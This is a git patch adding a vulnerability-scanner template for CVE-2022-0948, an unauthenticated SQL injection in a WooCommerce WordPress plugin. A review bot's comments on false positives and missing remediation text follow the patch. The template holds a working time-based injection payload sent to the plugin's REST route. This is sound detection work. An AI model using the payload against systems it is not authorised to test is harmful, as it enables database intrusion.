From f0f87d7c9f009f3de397217bbd3d92362e477475 Mon Sep 17 00:00:00 2001
From: Aman Rawat
Date: Sat, 3 Dec 2022 16:34:00 +0530
Subject: [PATCH] Added template for CVE-2022-0948
---
cves/2022/CVE-2022-0948.yaml | 44 ++++++++++++++++++++++++++++++++++++
1 file changed, 44 insertions(+)
create mode 100644 cves/2022/CVE-2022-0948.yaml
diff --git a/cves/2022/CVE-2022-0948.yaml b/cves/2022/CVE-2022-0948.yaml
new file mode 100644
index 0000000000..a5199a57ff
--- /dev/null
+++ b/cves/2022/CVE-2022-0948.yaml
@@ -0,0 +1,44 @@
+id: CVE-2022-0948
+
+info:
+ name: Order Listener for WooCommerce < 3.2.2 - Unauthenticated SQLi
+ author: theamanrawat
+ severity: critical
+ description: |
+ The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection.
+ reference:
+ - https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576
+ - https://wordpress.org/plugins/woc-order-alert/
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-0948
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-0948
+ cwe-id: CWE-89
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,woc-order-alert,unauth
+
+requests:
+ - raw:
+ - |
+ GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ @timeout: 15s
+ POST /?rest_route=/olistener/new HTTP/1.1
+ Host: {{Hostname}}
+ content-type: application/json
+
+ {"id":" (SLEEP(6))#"}
+
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration_2>=6'
+ - 'status_code_2 == 200'
+ - 'contains(content_type_2, "application/json")'
+ - 'contains(body_1, "olistener-action.olistener-controller")'
+ condition: and
\ No newline at end of file
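Review bot: The only evidence of injection in the `matchers` block is `duration_2>=6`, so a host that answers slowly for unrelated reasons (an overloaded server, a rate-limiting proxy) and returns 200 with JSON on the REST route would be reported as a critical SQLi. A baseline condition such as `- 'duration_1 < 6'` would reject targets that are also slow on the static-asset request, assuming the engine exposes `duration_1` the same way it exposes `duration_2`. The `info` block gives no fix guidance although the description names the fixed version; a line like `remediation: Update the plugin to version 3.2.2 or later.` would make the finding actionable. The file also ends without a trailing newline.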